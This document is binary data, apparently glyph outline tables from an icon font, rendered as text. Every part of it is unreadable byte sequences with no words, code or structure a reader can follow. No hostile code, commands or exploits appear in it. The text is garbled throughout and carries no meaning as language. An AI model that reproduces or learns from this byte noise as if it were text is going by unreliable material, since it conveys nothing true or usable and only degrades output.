'   '        &   &     @    P&        '   '        &       -r~7#";32?63276=6767''4767327654'&+&'&?654'&#"'&'54'&#"/&#""'&#"76'%'631q  '   !    '   ! !  `  O E   !   '   ~ !   '  ' L 1 7 Tfo%367&'#&'&?6'&'&'5&'/&#332?66756763276/&767'"'1&547632#&'67#&'&?6'&'&'5&'/&#332?66756763276/&767367&'"'1&547632#[                P                                      3@M%'54'&+"#"/&+";54?'3273276=4'#"'&?6#"/&765    5  9#''#J 0 0 0 0 P  P ) 0 0 00 0 3Pbu%'54'&+"#"/&+";54?'3273276=4'&7676#"/#"'&?'"'1&547632#%#&7567635    5  9#''#J      0  P  P ) !       x0   @`.%'#"/&547632763254767+"'&5476;ӓi j   S`j j T     @`/"'1&5476;2#"'&=#"/#"'&54?6327   j iS   S j j&I%#!"'&=4'&#"!676754'&#"32?3276=327654/&#"   ))  I  I `@ @ @))@ W J J EIN%32+32+'&/#'&'&?#"'&5476;7#"'&5476;767#'33'#E[ @ 3     3 @ [H GE! A[ v   4  LL  4   MM@ @/4?DQ##"'&=#"'&5476;5476321#35&'1&'6767#3567167&'&'#30  0  F J  @00p  p00`     0%0    0  ```0 ` p```  `@FS_4716323547632#"'&=##"'&=#"'&5476;567167&'&'#336767&'&'#0   # 0       ppp       '%0      0   `@`  &+76'&+;3276'}3   )     0 &2%&'&'#/'&'5#!2765&'567!"'&54763! 077`))@ @  p   ,- ))  Qp  @7R#'&'##!6767&'&'&''&'567336767#&'&?&#'&76776X ~ X    k'>1$ M '  M ' '>1$`!!     0  M  k  0  M@/:'&'676#"'&=&'&'676754763215/$ $/  F,--,F  @**} # # 34II43 # #A !!-."! /CWk21!2#!&'&'476321#"'&=47631#"'&=47632721#"'&=47631#"'&=47632   p"      @        "P @ @ `   ` `   /CW21!2#!&'&'47634716;2+"'&521+"'&5476;21+"'&5476;   p" ` ` `   ` @ @   "P `  @   `    *7&#"+3#7#3%35&'%#371!67675!FV\\\Lhv F hh@@Q%1#&'&'&'&'&56767"'&'67&'6763&'&'47676767672!"  "!!"  "! "!!"  !!!" ,:gp/&54?6367675&'&56767#4'1&#"67%676'&'5#&'&'4767567673567&'@  PP   "" $%6   PP   "" $%6( H H ( "" 6%$(  7 H H ( "" 6%$(hKT]f1;276=&'&56767#&'&'47675#&'&'5&'&56767167&'!67&'67&'    "" )0 "" 0) ""P p ' ' "" ')G "" G)' ""-6Zcl3&'&'47675&'&'#/&54?6167&'%1&'&'47675&'&5676767&'67&'2 6%$ ""   PP ~ ""  ""  ($%6 "" ( H H :a "" "" /@ENV7676'676'&'&?&''&'&?&'&5676?676177&'1    5'3      *)B  V.%>= ~/  <  *  4  G&%,F33-  M%(G7567632632/&#676&'&'&'676767'&'1   >-  =X?2332?X=  ->D.-*-  i(  832??237  (--D2&'@"'!3#!67&'#'36767&'&'!!   HH  @  00 @  0BV21##&'#&'&'676725#"'&5476;476321&'1&'676721#!"'&54763!@  %6%$$%6#    @`  @   $%66%$1       0BTan3276/&3%?6'&+"!!6767&'&'1&'&'6767#1&'&'6767#5676733#567673O A A  A A[`        P @  @ ` DD D D$`        0  00  0@*C67!&/&='&7167167&'&'76'&'&?76/7  j='(@  ))==)(()==)) %% $$ %% $$ //A)$0 O=)(()==)(()=% $$ %% $$ %%921+32++"'&5476;6?#"'&5476;7676;` % -P k7 % % -P k7 %  l    l  #'#!5&'&'1!67675!@  0  `@ P   @:21+32+32+#"'&=#"'&5476;476;   P P      `  @  @ @   3>F'"'&'32#"'&=&'&'676754763211567167#<* " -,F  F,--,F  @**@"[# )  \ I43 # # 34II43 # d "!..!! "[@29>#5&'!"336?3276?32?3276=4'&#+737!5! K  ) h_$ @ R\` Z   i J  P @;  et675&'32?65&'"56'&'"'&##"/&##"/&##"/&#367673674/&#"1'3676754'&#@?  !  Zl lZ Z5 7'(1B*+ ! !  B*+ `@@00  M Zl kY Y4 :,,@ 00G L z. ,,@ @!3C%1#!&'&'5#&'&547%621%16767&'&'1367&'&'#@     ""@    `""@F47163!2+32+/&76732767#"'&5476;&'&+"'&51  8$ $ !!.  P   P     ,f     <732+/#"'&=#"'&5476;54763276          z    z  c21632547632'&'&'#"'&="#"#"#"##"'&=32#!"'&5476;&'6767547631   *   #    .$%6  /2  !! 1#$. -D `` D%?6%$   5K;..1 .?632#!"'&='&'&76?547632w      )  " '     8#"'&=&'&'#"'&5#"'&=6767547632F,-  *  *  -,F  # 34I .!"   "!. I43 # $1?JU`;&/&'&'5676732?632&'5#%5&'#767651%367&'#367&'#367&'#&a)l5DD5l)a%"**"#((# iU* !! *U5E0UMU0E5- `P1#"'&=&'&'"#&''&'&?5&'&'#"'&54763636?676+   $  N     0 # _-  d <  +      !_  6#+3E[67167!!&'&'53&'&'56767#135'15#16767&'&'1!!&'&'567``@@@@@@""""p3""`@@@@ """"""36:>%354763232+/##"'&=#"'&5476;56765#/39    ad    *w::      @@VV-F#1"'&7632767&'&"'1&547632#&#"'&?6327632'B>  ZLNLJ 1 ^m ~&&  && ?     D, ,5=132+##"'&="'&547635476;&'1&'#336767#;+*   *+;`    [  ``  $#8  8#$`   ` @@@CIQW132+32+##"'&="'&547635"'&547635476;&'#33654'##3674))  ))4P     pN/PP/+    +@    @ ` @ ` 167167/"#'"#&'54?5'&=4?5:nn :bBw 99Q+ ) ) +Q99 wB#/IV4716;'&/##"'&536767&'&'#%1##"'&5476;&'1&'#36767 P=)('4 8*  @0""0P0  00  P0 00  ()=-#"   ""` 00 `   p ` @71++++"'&5476;5476;5476;5476;2@ ` ` `  ` ` `   ` ` `  ` ` ` KT]f7!5&'&5676732#!&'&'47675!"'&5476;5&'&56767'67&'%67&'67&'@ "" @  ""  @ ""  7 "" 7  7 "" 7  7 "" 7h0'1CU67167!+"'&=!+"'&=&'!'&'#1"1327654'&#271654'&#"3"`"      "  @  p"")0   0) HHH   @   P2176763676756763#"'&='&'&76?5'&'&76?547631` w  w  @4$$  66N`   )  )  #" '" '""5  N33     6 @/AT767167&'&'%1##'##'#&'&'6767!67167&'&'%67&'&'675""""p@@D----DD----D  """" `p--DD----DD-- !  ! ss .3Le632#"/&54?6312#"/&5477'?632#"/&547?632#"/&547&&''##}"ii:9999a8998&&&& ##}-ii:99998899 _'&?6#"/#"/#"'&54?'&54?7'&54?7'&54?76676#"/XXY ,"&' +#&' E E     .9  ;-'& @XWf! ! E D &&!* '& * &'.:!! ;/ FX1&'&'6767632'&'&?#&'&'676727''&'&76?67167&'&'    t&u   E --DD----D731  @ ))))     7 +  z"D----DD--6% 0v)))) 0  @KValw673#&'673#&'673#&'21#!"'&547&'&'4763!%#&'673##&'673'673#&'#&'673'673#&'#&'673'673#&'#&'673'#&'673 2  2 `(((xPP8 8** **8 P888888@L67167&'&'&'5'&'&?67232;23+#"'&=##"'&=p     :-" 8        7  a'!$  ` `` b@U%+"1&&"1#"'&=4'&+"+"#01"+"'&=4=#&'&547%625476;2# 9 @ 8   j   5    X X pE  ^% y/  @.%#'76/&#&'&'5#&'&547%62#{&Q v %1#!&'&'5#&'&547%621'5&'##336753675&'#@    088088    880880@821'&'676#"'&=&'&'6767547631 /$ !,6%$$%6,!$/  F,--,F  # $%66%$# # 34II43 # 5GYc1&'&'6767#'&/!&'&'6767!#'3'3010156767676=#!1133#'015    JT !     +.(@.!!)HODVEK@    ~  2 `   @0J2'(  )##>_@g I>#&'&'&'&'6756767256767&'&'675&'&' @."".""3""33""."".@ 6!!! 6 3""3""""3 6!!! 6 x;%!"3!27654'&#%33276=327654'&+54'&#"#"3` @ p  p p  p   o o  p p  : -676+&'#&'&?61&7!!&'&/  ,    "!,+!"    @Q  **Tn7676'&'&/&'&76767676'&'&'&01'&'01'&21327676'&/671672&'&#&'&7 +  -  H-!  /&   ##1   /  + o",      ' #+      3 `  '4DKW%5#"'&54763!67&'!33'&'6735'&%4'1&5#6'67'7&'1&'#327  p 34I `"H? }[*9)P -.9  F,-h Fp[(5I~B#$2 ^Sw21/&+#"'&=&/&'&7676367675&/&'&567675476314716;'&/##"'&536767&'&'#    4"#     4"$ p P=)('4 8*  @0""0  #%'     #%(  @ ()=-#"   ""+A671673#&'&'671673#&'&'5%1#&'&'67673                  p    `         &N1#3/&76735#&'&'56767!35#76'3!&'&'567673#332?. GG .LJG 10 G @ GG @@@@@@@C&'1&'56767!!%5!!1#&'&'56767!3/&76735&'#@0"& GG &P @@@@@@" GG @>C%1!&'&'56767!%#&'&'56767!3/&76735&'#1'35#0"& GG &P @@@" GG @@@@M^it767167167&'&'&'32?654/&/&#"'&'05'&#"?617&;676/367&'#7&76/6'&?"":9HH9:"""":9HH9:""       #  ':'  +      H9:"""":9HH9:"""":9Hi          P .Cbh6324?632"032+'&767+"'&=6767167&'#"'&54?67&5#"'&5476;51 p@ @ @ @  ȱ ))5%? @@ @_'8 @ @  x  C  )) m!? @ %  vJ&@!3C671673;#!&'&'5#1&'&'6767''&?6'&1 8$#"@()==)(()==)(c= ( H  '.->-%%@=)(()==)(()=+< ( H @!3L671673;#!&'&'5#67167&'&'76'&'&?76/7 8$#" ()==)(()==)( %% $$ %% $$ '.->-%%@=)(()==)(()=% $$ %% $$ %%*IV4?67!&'!"'&51#&'&'53353712+"'&=476356767"1354'&#LL //c   @@"  " @ % rr   E   "0   0"0 00 y673#7'&76/3567&'5#76'&?'3#&'6735&'/&767&'#&'567367''&?6675#&'116767&'&'67&'P/# 8 "" 8 #/P/# 8 "" 8 #/    p" 8 #/P/# 8 "" 8 #/P/# 8 "    E76675#"'&5476;#7'&76/3567&'5#'&763#"'&5476;5&'/&767&'#"'&=47633671! $-  Q/# 8 ""  _Q  -$ 8 #  #p! " " 8 #/P#|  K" " 8 #/ P  DVhx21+3+&'&'5'&?6/35#"'&5476;&'67673'271654'&#"31&'&'6767''&?6'&1` !" D--87)0   )))  A   a()==)(()==)(c= ( H   %--D88)  4)) 0   =)(()==)(()=+< ( H DVhq|21+3+&'&'5'&?6/35#"'&5476;&'67673'271654'&#"367167&'&'67&''675&'` !" D--87)0   )))  A   A()==)(()==)(  %--D88)  4)) 0   =)(()==)(()=`PPDVh21+3+&'&'5'&?6/35#"'&5476;&'67673'271654'&#"367167&'&'76'&'&?76/7` !" D--87)0   )))  A   A()==)(()==)( %% $$ %% $$  %--D88)  4)) 0   =)(()==)(()=% $$ %% $$ %%GYx21+327+&'&'5'&?6/35#"'&5476;&'67673'271654'&#"312+"'&=476356767"1354'&#` !1 D--87)0   )))  A   "  " @   !--D88)  4)) 0   @"0   0"0 00 @IVb7&51476325#"'&54767!5#"'&54?632#"/3#!7632#"/47167#5#"'&=3) )` `) ` ` )` ) ` `W  @@  @) *t  r* ` ` *r  t* ` `X   DP\{'&5476325#"'&54767!5#"'&54?632#"/3!7632#"'154767##"'&=3712+"'&=4763567671354'&'i` )@ ) ` ` )K ) `  @  @"  " @ 7` *t  r* ` ` *rt* ` 8   !0   0!0 00 "/<IVc67167335673!&'&'3675&'#3675&'#3675&'#73675&'#3675&'#%1#"'&54?#"'&5476;'&547632  ` (   @           P s s P  HH   @  0    0    P    P@"Xj}%5#"'&54?632#"/#"'&566736'&'&'&'&''&'&7676761671'&'&"567673%&'&'&#&531 P P   "+*#  &-21  13+&  #*+#N     P P  g          ⲹ   @S135#"'&54?632#"/3&'&'&#&&'&#"&'&"&=676735676736736'&'&'&'&''&'&76767616761  P P 0 !  *#  &-21  13+&  #*+#"+ Г P P  `       `  @        @#5GYk}21#"'&'5#"'&54?#"'&'676;1&'&'67671&'&'676767167&'&'1&'&'676731&'&'6767%67167&'&'1&'&'6767#67167&'&'%1&'&'6767'67167&'&'   4  !        `    `          a          `      3  P                                        @7[%21#!"'&54763!'#1"/&5476325476327632'#"/&54763254763276321   I ` )  ) `` ` )  )   ) ` * * ``` ` * * o);M76/&765476311#"'&'676321#"'&'67632!671632#"'&'1+"'&'5'&?676;27676;26;2/+"'&'5'&?&/+"'&'5/&765476376/@@            0   & "  " &   0   $ 0 $   @@v@@v   `     &1 G ? ? G 1& &1 D16 61D 1&Hv v@@H\21#"'&5476313'&547632#"'&54?##"/&54?63211#"'&547632    ** ` ` ** ` `      @ I )) ` ` )) ` `  @ !1Jc"56376#"'&?&'1#&567'&7673/167&''&'567317674'3#&'56761Y> i ,>A7 j &U+=X= j 'A8 i `A8 i &X> j +=\%@6 i +>Y> i OTX#1"'&54?632#"/32+&'&'&'&'##"/1&576?6323547151 ` ` )@ @6%$s* ` ` *s#)) ` ` *  $%6) `  ` (*-?g631256767110+"'&'67673'&54711&'&'6767"'1&5476;121#"'&=#"'&54?#21763232+"'1&'&=47631#"/#"'&=4014767056301";2+ h  `  j w `   i j` i j `  Mj i   `  j  `  h `  a j i j i  _ i j `  "GY}7632#"/&547632567632#1"/&54?6323+1'1#"'&547632'1#"'&54?#"'&5476;'&547632&514?632#"/#"'&=#"'1 @ @   @ @ 3 3   i @ 3 3 @ @ @  m @ @ 3 3 @ @   W   @  @ @ @ 3 3 w5G\r6567#&'673'&7167167167&'&'&'&7167167&'&'63#&'56777#&'673&'5'&71%&'5673#/?`&?w %%11%%  %%11%% >&`??&`?`&>??&`?  L1?`&?@?`&>&`?>.]6312#"'&54?##"'&=67673'&54716312#"'&54?#"#"'&=67673'&5471) ` ` *  $%6* ` ` ` *  )*  ` ` )   6%$) ` ` )    )) -[m63123#"'&=4'&'##"/&54?1#"'&54?#"#"'&=67673'&5476321&'&'67671&'&'6767 )   P P^ P   ) P )    P P P     ) P@7["'1&54763!2#!6312#"/#"'&=#"'&54?7632#"/#"'&=#"'&5471   I ` )  ) `` ` )  ) `   ) ` * * ``` ` * * 721&'&'674763676753!&'&'67673  `))p  `  p %%  ))       "8##&'&'567675#&'476;27167&'&'&'   @    ]&&]       >IT#56736?6;2#&'&'67&'67&'67&'67&'1367&'#367&'#PZ  P````((        h`0+L031036767267632632121!&56767147163!2#!"'&547&'&'1`    P  2  2@     8** **82?MX67167!#6=675&'&'#56/&?67571%67!!&'51#!"'&=!'367&'#     p; @ @ %% ``  @``  `  !  P @ @ $yy$    @@EJO21+3+"'&=&'&'+"'&=&'&'535#"'&54763!#35#35+35  (H)   ))   )H( XPPPP0PP  @)@ @))@ @)@  @@@@@@@ 5:?DVf21+3&'&#+"'&=&'&'535#"'&54763!#35#35+351&'&'6767''&?6'&1@ (H/A5)) )   )H( XPPPP0PP()==)(()==)(c= ( H   @H',)@ @)@  @@@@@@@=)(()==)(()=+< ( H  5:?DV_j21+3&'&#+"'&=&'&'535#"'&54763!#35#35+3567167&'&'67&''675&'@ (H/A5)) )   )H( XPPPP0PPx()==)(()==)(  @H',)@ @)@  @@@@@@@=)(()==)(()=`PP 5:?DVo21+3&'&#+"'&=&'&'535#"'&54763!#35#35+3567167&'&'76'&'&?76/7@ (H/A5)) )   )H( XPPPP0PPx()==)(()==)( %% $$ %% $$  @H',)@ @)@  @@@@@@@=)(()==)(()=% $$ %% $$ %% 6;@Edq47163!2+#&'+"'&=&'&'535#"'&535##5#3#35#12+"'&=476356767"1354'&#  (0  ,)   )H( xPP0PPPPx"  " @   @ 0 )@ @)@ `@@@@@@ "0   0"0 00 @2h47163!2#&=&'&'&'&5&'&'"'&=6736'&'&'&'&''&'&76767616761   )) *#  &-21  13+&  #*+#"+` $ } )) } $       9#567673#5&'&'#47163!2++"'&/#"'&51`0+*A0A*+0,0,`      A*++*A,,@    ;?376#/&''&?6?5#&/&76367'&7676176/'&?''&5''&?67'&?66?63761 ''%% "  !;      !  # %  4 C 9( 8((8 ( I :: I    5 & $ -   '  O?$ / $1>KXer67167!#5&'&'#&'&'3675&'#3675&'#73675&'#'3675&'#73675&'#3675&'#1&'&'6767'#3?6/&1   3`  ` P  P  p    p  P  ()==)(()==)(YY 8 8   ##)L2P  P   0  0  P  0  0  =)(()==)(()=- 8 8 $1>KXer1#5&'&'#&'&'6767!3675&'#73675&'#3675&'#'3675&'#3675&'#73675&'#1&'&'6767''&?6'&1P 3`  `     p  P    P  p  p()==)(()==)(c= ( H  ##)L2P  P    0  0    0  0  =)(()==)(()=+< ( H $1>KXer1#5&'&'#&'&'6767!3675&'#73675&'#3675&'#'3675&'#3675&'#73675&'#67167&'&'67&''675&'P 3`  `     p  P    P  p  P()==)(()==)( ##)L2P  P    0  0    0  0  =)(()==)(()=`PP $1>KXer1#5&'&'#&'&'6767!3675&'#73675&'#3675&'#'3675&'#3675&'#73675&'#67167&'&'76'&'&?76/7P 3`  `     p  P    P  p  P()==)(()==)( %% $$ %% $$ ##)L2P  P    0  0    0  0  =)(()==)(()=% $$ %% $$ %% -:GTan1#5&'&'#&'&'6767!3675&'#73675&'#3675&'#'3675&'#3675&'#73675&'#7213##4763P  `  `     p  P    P  p   @  ` P  P    0  0    0  0  `  @$1>KXer1#5&'&'#&'&'6767!3675&'#73675&'#3675&'#'3675&'#3675&'#73675&'#12+"'&=476356767"1354'&#P  Y  `     p  P    P  p  "  " @  /%P  P    0  0    0  0  `"0   0"0 00  +8ERi}&'56771#5&'&'#&'&'6767!3675&'#73675&'#3675&'#'3675&'#5367&'#167675&'&''&6757675&''@  `  `     p  P  X  0X     # #P  p ` P  P    0  0  X@P      I  `+4  `+4@+8ER_l67167!#0+5&'&'#&'&'3675&'#3675&'#'3675&'#73675&'#3675&'#6'&'&'&74?6767'   *F7 `  ` P  P  `  p  P   x 6 6 x 2_  @-88,P  P   0    0  0  R0!))&&&&))!00**(% -:G^w1#5&'&'#&'&'6767!3675&'#73675&'#3675&'#'&6757675&''&'67675&'&'5P  `  `     p  P   # #}   ` P  P    0  0   `+4  `+4 @  @@@ "/<IVcp1#5&'&'#&'&'6767!3675&'#73675&'#3675&'#'3675&'#3675&'#73675&'#1&'&'6767671673+"'&51P  Z  `     p  P    P  p  0""""'f'   $P  P    0  0    0  0  """"''  -:GTan{67167!#5&'&'#&'&'3675&'#3675&'#73675&'#'3675&'#73675&'#3675&'##567673#567673#567673'#&'&'53'&'1&'53#7#&'&'537&'567&'567'&'567    `  ` P  P  p    p  P  ""P""""0""""""`  ` P  P   0  0  P  0  0  0""""p""""`""""hh`  8  076776/&/'&?'&'6?'&76 "G jg5 e!!e 5gcp Lcj G"!e 5gg5 e!  p 2;DMYd&'56732+"'&=!+"'&=6?676313'&'#67&'%67&'6/&71!6'&?^         :0000XPP8O%   %O@ 55 010//04[76;2#767&'3&'677#!#&'&'56767672716=&/&'&+"3276=331t /@@"":9HH9:"" t  **jH9:"""":9H h!@ @!h   Cx67167&'&'1"'1&='&'&?673'&/#"'&=##1756733##&'5#"'&=47635675&'6731O  44 44    H 50,<  @   Q,,Q    t m8U \`   doL_67167&'&'5#"'&?'&'&?67'&/+#"'&=##"'&5167167&'&'1#"'&='&'&?676;2'&/#"'&=#_ :%::%;     H8   4   4   `P]%  O,,O  %]P PP `   Q Q   `'2%&'&'47'#&'&'676776767'6?&'1}!"""""!"% %R+"" ""I""ІJ /Oa3!&'&'676736767271654'&#"3756;6?67&'&'#"1327654'&#%&   [  W :, !:'W  @@   g   $#   ?!,8CO21673!&'&'67676767'&?6%'&?61'&?67'&?616736'&'&'&'&''&'&76767616761 ")  0  0w 0  0   0  0 0  0 *#  &-21  13+&  #*+#"+) P Pq P P q P Pq P P        +0FQ\n1#32#!"'&5476;7#&'&'6767!!5!%1#&'&'67673367&'#367&'#271654'&#"3   K  K   `@  @  @0            @@   ` @`   (>Tj4716;2+"'&=6'&/&76?21+"'&=476;21+"'&=476;4716;2+"'&='21+"'&=476; @ @ 6  7  7 @ @@ @ @ @ @ @ @ @ @ @n 7   7   @ @ @ @  @ @ @ @ (:J1/&'6767!7!&'&'5327%1&'&'6767''&?6'&1 3&': 'Z()==)(()==)(c= ( H   .+   A/У =)(()==)(()=+< ( H @0DP676#&'&'#'&7667'&76632?671#!"'&54767!&'5671 a VG   PL a?f  ,   7W3 h XL   00?>Cy213!'&7673676;!2"##&'&#"#&'&/&=4763#!5!6736'&'&'&'&''&'&76767616761` K  J  33  A*#  &-21  13+&  #*+#"+    |H H| ``       @!3<G671673;#!&'&'5#67167&'&'67&''675&' 8$#" ()==)(()==)( '.->-%%@=)(()==)(()=`PP@!3>671673;#!&'&'5#1&'&'6767'#367&' 8$#"@()==)(()==)(P '.->-%%@=)(()==)(()=@!3L671673;#!&'&'5#67167&'&'7&'#3675367&'#5 8$#" ()==)(()==)(0000 '.->-%%@=)(()==)(()=A0000@!3<_671673;#!&'&'5#67167&'&'67&''6756736757674'&+" 8$#" ()==)(()==)(@ (   (  '.->-%%@=)(()==)(()=`     @ 7>671673;#!&'&'5#6'&'&'&74?6767' ]!7  x 6 6 x 2_ /%%-::/@b0!))&&&&))!00**(%1ew676&'&'676761&'&'&'&'327676'471673#!5"'&5476732#!"'&=47635271654'&#"37"1327654'&#271654'&#"3]  %--DE-,3 )$ "               $-- D....D)12.s*%o   AA   a @ @ a   @   @   @3E1'&?&'&''&?'&766767'&76"1327654'&#a)#"  "#)N ] .. ] N?  _; 17 PP 71 ;   !EP7#&'&'"'&5476;2#35#%21#!&'&'6?5"'&'676;3'&=#)  1@@@ v  u  01@)   O``    @ OO  2#&'&'&763!76?#` !! @!! l    ]] )5%1&'&'67676172#&'&'&763!76?# ` !! @    l    ,V1"#'&'&767&'676726761763'&'&'"#&'&'45&'&'&7676123'&'&'&'67&'&76761&''&'&7676745&5676723676761%'&'&567'&76;/176+&'547667&'&71                        !  < R  = !f      4            &      ' !,  =[!-  =' $I/#3+"/&'567321'&'&7676367&'#&'&76;23!"'1Ig  Wj? p) /  #  wyN * /#D   9 '_hd   X &`#I[1#"'&547632471632#"'&5213&'&'6767&=673476367167&'&'767&=476;476732&'&'654'1716767&'&/471632#"'&5471632#"'&50      +--DD--, ))))5    +--D0%%))))   P     0  0 ''2D----D2'' ))))3    ''2D--'"''"))))  0   `Jb76/&7676354?676?5476323!&'673'&=47632"'1&54763!##5##5#_F   /A/    E  VV     A /\  $   4&^^&4   $  \q cc q  0Y471632#"'&5/#'&?'&?6;2/76/&7676+"/&=4767%+"'&=4?67676?5476321   `  )$+  <   0 ` y  0y ` .   <    ##Y# #YP #  :(t    t(:  # P :d67167&'&'76/&7676+"/&=4767%+"'&=4?67676?5476321 00  00 <   0 ` y  0y ` .   <  P0  00  0P #  :(t    t(:  # P @ 2J%#"/&76767676&#367167&'&'7;?6'&+76'&1 */*54((44, ")K12 ()==)(()==)(`$`$P6+ .<;+#''#'''21K=)(()==)(()=RH6H6@ 2B%#"/&76767676&#!1&'&'6767''&?6'&1 */*54((44, ")K12@()==)(()==)(c= ( H P6+ .<;+#''#'''21K=)(()==)(()=+< ( H @ 2;F%#"/&76767676&#367167&'&'67&''675&' */*54((44, ")K12 ()==)(()==)(P6+ .<;+#''#'''21K=)(()==)(()=`PP@ 2=%#"/&76767676&#!1&'&'6767'#367&' */*54((44, ")K12@()==)(()==)(PP6+ .<;+#''#'''21K=)(()==)(()=@ 2K%#"/&76767676&#367167&'&'7&'#3675367&'#5 */*54((44, ")K12 ()==)(()==)(0000P6+ .<;+#''#'''21K=)(()==)(()=A0000@ 2K%#"/&76767676&#367167&'&'76'&'&?76/7 */*54((44, ")K12 ()==)(()==)( %% $$ %% $$P6+ .<;+#''#'''21K=)(()==)(()=% $$ %% $$ %%" ".W5#&'&'15676731%3&'&'#676713547632#"'&=##"'&=47632@Y<= A *+==+* A =B1;##&'&'6767367167!3!&'&'5673535#7#5 ` "! s  0    @``` @"p @ `  ``(=1'&'&76761'&'&76761321#"'&547631>  @ @ [           1P]&'1&'1&'6767#"'1767167&'&'712+"'&=476356767"1354'&#('66RI44 )  "  " @ 3!87;;-R66,-G+%_ @"0   0"0 00 @EINWa110101#/#'&?#'&?''&767632&'&'#&'6733''37'67&'%3&'67671HE88!!"   'Q/ K4 (+O ) *@65L0J!0i&N!!88E(", DF *F 7e 0  27  aH.-))))'`a/%#"/&'&'6767'&#3?6/( ~5FX;;;;XX;;vvHHF5~ (;;XX;;;;XY HH%0;%#"/&'&'6767675&'3675&'3675&'( ~5FX;;;;XX;;PPF5~ (;;XX;;;;XH@@``K]21#"'&'532+#"'&'5#"'&'676;5&'&'67677#"'&'676;16767&'&/7/'&?'&'&?'&767632_  ###9     8#$-.C9*!  `)))) l ''/<IVcsy135673#07076/3675&'#"'5676733675&'#3675&'#3675&'#3675&'#!&'&76773' (  zI G `@        U   I0>= HH  ""z w\ @    `  0  k:z)@c,67167&'&'47677632!&'&'1""""  ~0  p""""YO @AF%1'&/3?3'732#!"'&5476;67?677'&76?63'#:! *5JB>C  l ! * p !  ^XLN   '#'\  -3NTfx1&'&'6767+"'&=&'&56767315567&'673+"'&5767&''1&'&'676767167&'&'1+"'&=&'&5676735767&'. @  0 $.% 0  @  @  0 0 hl*B4' "0 2T'4B* 0" VT"+ +"0  0*TTT#7I1#"'&547632471632#"'&521#!"'&54763!'471632#"'&51+"'&='&?676;27676;26;2/+"'&='&?&/+"'&'5/h       @   0   & "  " &   0   $ 1 $  x  `        &1 G ? ? G 1& &1 D16 61D 1&?m67167&'&'126?632/&/'&/&?#"'/'&/#'&/#"'&=6767%67167&'&'1#"'&54?1     V" #"   2 G    w:    6*    ;(= <    P8%  A6 \  XM!@ 2  {  P    -$ > ;>/6I\6716#"'&=##"'&5&/&76763276?67167#"'&'167167&'&'132+"/#"'&=##"'&=6767  ;    ;             I+& 0    !  #C   2 C#  ##        P$;    `)<N1'%'&'&767%6 671632#"'&'671632#"'&'1!1#"'&'67632'+"'&'5'&?676;27676;26;2/+"'&'5'&?&/+"'&'5'1p   !            0   & "  " &   0   $ 0 $    $  `    1& &1 G ? ? G 1& &1 D16 61D DIm67167&'&''&'&?676;2'&/!2#!"'&5476;55#37&51476325476327632#"/     :  : X  XP    P P    0  a a  0   ``y   P PDIm67167&'&''&'&?676;2'&/!2#!"'&5476;55#31#"/#"'&=#"'&54?632     :  : X  XP    P P    0  a a  0   ``G   P PTf67167&'&''&'&7#&'54'&#"/0#&#&'&'&767017676;21'"1327654'&#""""%? <(  f  D $L#3   p""""N  -% 03  P eG  _   Fn67167&'&'"'1&'5'&'&?676;2'&/#"'&'5##176/'&?'&'&?'&767632      :  :    L &72 <: N B( L     0 0  a a  0   E&)O 66 O  -E J JC\1&'&'67671#"'&=##"'&='&'&?676;'&/7&'56767&'5&'         : $-J /X    P  0  a "Y  9`pp ]67167&'&'"'1&='&'&?676;567673#&'&'5335#32+#"'&=##1      :     @        0 0  a P    0 @    @BTd1&'&'6767#"'&='&'&?676;2&1&/#"'&=#1&'&'6767''&?6'&1    8   :  -   ()==)(()==)(c= ( H     Ѐ 0  a J#0 =)(()==)(()=+< ( H @BT]h1&'&'6767#"'&='&'&?676;2&1&/#"'&=#67167&'&'67&''675&'    8   :  -   ()==)(()==)(    Ѐ 0  a J#0 =)(()==)(()=`PP@BT_1&'&'6767#"'&='&'&?676;2&1&/#"'&=#1&'&'6767'#367&'    8   :  -   ()==)(()==)(P    Ѐ 0  a J#0 =)(()==)(()=@BTm1&'&'6767#"'&='&'&?676;2&1&/#"'&=#67167&'&'7&'#3675367&'#5    8   :  -   ()==)(()==)(0000    Ѐ 0  a J#0 =)(()==)(()=A0000@BT]1&'&'6767#"'&='&'&?676;2&1&/#"'&=#67167&'&'67&''6756736757674'&+"    8   :  -   ()==)(()==)(@ (   (     Ѐ 0  a J#0 =)(()==)(()=`     @BTm1&'&'6767#"'&='&'&?676;2&1&/#"'&=#67167&'&'76'&'&?76/7    8   :  -   ()==)(()==)( %% $$ %% $$    Ѐ 0  a J#0 =)(()==)(()=% $$ %% $$ %%Qy1&'&'67677'&'&?676;2'&/+#"'&'5##"'&'5#"'&7176/'&?'&'&?'&767632    &" 5 5 "%    L &72 <: N B( L     s9  ZZ  9s` `` ` E&)O 66 O  -E J J?-?u1?6&'&#"&'7&'&=6763267167&'&'6736'&'&'&'&''&'&76767616761&=>j  i!   @*#  &-21  13+&  #*+#"+`(    a #$)           <N213'&/#'&/"'&'56767676=4763167167&'&' !9W, &a\  .       )##O:  4  I I2'(   P    |;M|13'&/#'&/"'&'56767676=676321#"'&'6767&/7'&'#'01&?'&76763276/!9F, 'P\  .      p'%  B( L L &A N ;)##O:  4  I I2'(    %    $1 -E J J E-  O 6?+K67167&'&'32'&/#"'&567167#"'&=#"'&?'&'&?p    8 :   n  &" 5    P a  0 `6 `s9  Z@EWy67167&'&'1&'1&?676;'&/#"'&=##"'&='1%1&'&'676767167"/'&'&?6765673#&'/&76     : $-J /         6 0 )88/ 0 0     a "Y  9  0 K    hf78  ` *;(J   ):G#&'6?473&'&'15#"'&54767!'&/#71+"'&=3o""i uL  6.   n ##pZ  D Z.    BOf6?#&'1&'&'473'01'6737&76'&'1'674'&#""'1&='&'&?67+""H62_  8 $L  n h 6  L 8 ## Zn   ` ?    nZ  '6H^w2#&'6?1&'&'473167"+"'&='276;1767167&'&'1+"'&=67673'&?'&'4763'&76?632#/&5471oo { @b`  @ q p @@@ p p @ ` o  +j `      8 8\8    8 DP[gr1&'&'6767#"'&='&'&?676;2'&/#"'&=#6/&71!6'&?76'&71%&76/0    8   :  :   OPPP0POPP    Ѐ 0  a a  0 YPOOP0PP/PP &[2#5'&'&?676;71&'&'67677756733##&'5#"'&=47635675&'6731 ' 6  L%27"""" 50,<  ԮZ  p""""@t m8U \`   d0T#"'&5'#"'&56?6471632#"'&5&'5'&?676;2/&'5#1        &  &  <  -nn @ $  1 G G 1XXM`67167&'&'1'&'&?6?632/&/'&/&?#"#"'&54?1&514?63236767&'&'#"'&5476;##"/    /  / #"   2 G  (= < P )) D----D P       /%  A6 \  XM!@-$ > ;> P ))  --DD-- PM`67167&'&'1'&'&?6?632/&/'&/&?#"#"'&54?1%1#"'&54?#"'&5476;'&547632    /  / #"   2 G  